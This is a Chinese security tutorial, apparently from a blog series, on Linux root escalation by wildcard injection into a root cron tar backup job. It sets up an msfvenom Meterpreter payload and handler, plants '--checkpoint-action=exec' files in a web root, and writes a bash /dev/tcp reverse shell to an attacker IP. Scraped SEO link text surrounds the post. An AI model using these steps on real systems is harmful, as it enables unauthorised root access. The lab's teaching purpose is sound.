当前位置: 首页 > news >正文

免费云服务器网站有哪些在百度做网站怎么做

免费云服务器网站有哪些,在百度做网站怎么做,深圳开发软件公司,公司内部自己做抽奖网站系列文章 操作系统权限提升(十八)之Linux提权-内核提权 操作系统权限提升(十九)之Linux提权-SUID提权 操作系统权限提升(二十)之Linux提权-计划任务提权 操作系统权限提升(二十一)之Linux提权-环境变量劫持提权 操作系统权限提升(二十二)之Linux提权-SUDO滥用提权 利用通配符…

系列文章

操作系统权限提升(十八)之Linux提权-内核提权
操作系统权限提升(十九)之Linux提权-SUID提权
操作系统权限提升(二十)之Linux提权-计划任务提权
操作系统权限提升(二十一)之Linux提权-环境变量劫持提权
操作系统权限提升(二十二)之Linux提权-SUDO滥用提权

利用通配符(WS)进行提权

利用通配符(WS)进行提权原理

接下来介绍一个非常有趣而又古老的技术通配符注入提权

首先先看下什么是通配符

在LINUX中通配符可以被用来模糊匹配,而且通配符的输入是由当前用户的shell去进行解析

* 代表任意数量的字符? 字符代表单个字符[] 匹配中括号中的任意单一字符 可以使用连字符-表示范围,比如[0-9]

我们在当前的目录创建几个文本,1.txt,2.txt,3.txt

在这里插入图片描述
接下来使用通配符去查看文件 ls ?.txt 可以查到 一个字符后面加.txt的文件

在这里插入图片描述

我们在当前目录在创建几个文件,a.txt,ab.txt,abc.txt

在这里插入图片描述

然后使用?进行匹配,可以看到?可以匹配单个字符

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

使用*进行匹配,代表任意的多个字符

在这里插入图片描述

使用ls [0-9].txt,匹配0-9数字的txt

在这里插入图片描述
[...] 匹配方括号之中的任意一个字符

在这里插入图片描述

接下来看一下什么是Wildcard wildness简称WS

我们先创建3个文件

echo "1" > file1
echo "2" >file2
echo "3" > --help

在这里插入图片描述

接下来查看文件里面的内容,发现文件1和文件2都可以查看,但是–help查看不了,直接调出了–help的命令,这种类型的技巧称为Wildcard wildness。

在这里插入图片描述

这时如果我们执行 ls * 那么就会执行 ls --help

在这里插入图片描述

如何利用这一点进行提权呢?大家和思考一下

如果有的命令的参数中可以去执行linux命令,我们进行劫持,达到提权的目的,我们以tar命令为例子

tar命令是Linux中的压缩命令,可以对文件进行压缩

tar -czf html.tgz 1.html #将文件1.html文件压缩成html.tgz

在这里插入图片描述
在这里插入图片描述

也可以使用通配符进行压缩

tar -czf html.tgz *.html #将文件所有html文件压缩成html.tgz

在这里插入图片描述
在这里插入图片描述

在tar中有执行linux命令的参数如下

tar -czf 1.tgz 1.html --checkpoint=1 --checkpoint-action=exec=whoami

在这里插入图片描述

可以对后面的命令进行劫持 ,只需要要编写一个这样的参数文件就行可以了

echo " " > --checkpoint=1
echo " " > --checkpoint-action=exec=whoami

在这里插入图片描述

接着运行 tar -czf html.tgz *

在这里插入图片描述

提权准备

一般都有备份网站的习惯,那么运维人员或管理员填写了备份文件的计划任务任务,如果滥用了通配符,就可能导致提权

*/1 * * * * root tar -cvf /var/html.tgz /var/www/html/ *

在这里插入图片描述

提权实战

首先上线MSF

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.41.211 LPORT=8888 -f elf > mshell.elfuse exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.41.211
set lport 8888
run

在这里插入图片描述

查看计划任务,发现有滥用通配符的,并且是root权限,可以进行提权

cat /etc/crontab

在这里插入图片描述

在/var/www/html下创建两个文件如下

echo " " > /var/www/html/--checkpoint=1
echo " " > /var/www/html/--checkpoint-action=exec='bash shell.sh'
echo "bash -i >& /dev/tcp/192.168.41.211/8888 0>&1" >> /var/www/html/shell.sh

在这里插入图片描述

使用NC进行监听,等待sh脚本被执行,连接NC

nc -lvvp 8888

在这里插入图片描述

http://www.yayakq.cn/news/178635/

相关文章:

  • 个人网站需要多大的网速做网站的大骗子
  • 网站建设基本话术辽宁手机响应式网站建设
  • 百度推广渠道商百度关键词优化手段
  • 淄博市住房和城乡建设局官方网站注册网站不用手机短信验证的
  • 网站建设zhuitiankeji网络营销市场调研的优势有
  • 重庆网站建设leco tec做网站一定需要虚拟主机吗
  • 网站建设捌金手指下拉十九景德镇建设企业网站
  • 山东网站排行手机网站搭建平台
  • 免费网站优化怎么做商务类网站
  • wordpress建两个网站网页游戏开发入门
  • 建设一个网站需要做哪些工作内容西安风险等级最新
  • 网站改版建议重庆做优化的网络公司
  • 手机模版网站价格虎皮椒支付WordPress
  • 网站集约化建设探讨网络推广优化工具
  • 北京网站改版哪家好一份完整app运营推广方案
  • 做网站导航站的注意点设计类电子书网站
  • 武义公司网站建设wordpress 搭建 cms
  • 山东德州网站建设电子商务是干什么工作的
  • 东莞网站制作 东莞企业网站制作工业产品设计图片
  • 建设网站的网络公司潍坊seo
  • 衡水企业做网站高权重网站做员会来顶排名
  • 提供秦皇岛网站建设哪里有sousou提交网站入口
  • 手机小说网站源码重庆网站建设子沃科技熊掌号
  • 淄博网站营销与推广wordpress禁止谷歌
  • 济南网站搜索优化网站生成器
  • 泉州建站哪些公司网站平台建设可行性
  • 网站注册域名位置爱淘宝网页网站建设
  • 学做衣服网站3维网站制作技术
  • 毕业设计代做淘宝好还是网站好国税网站页面建设中
  • 无锡cms建站wordpress 导入网页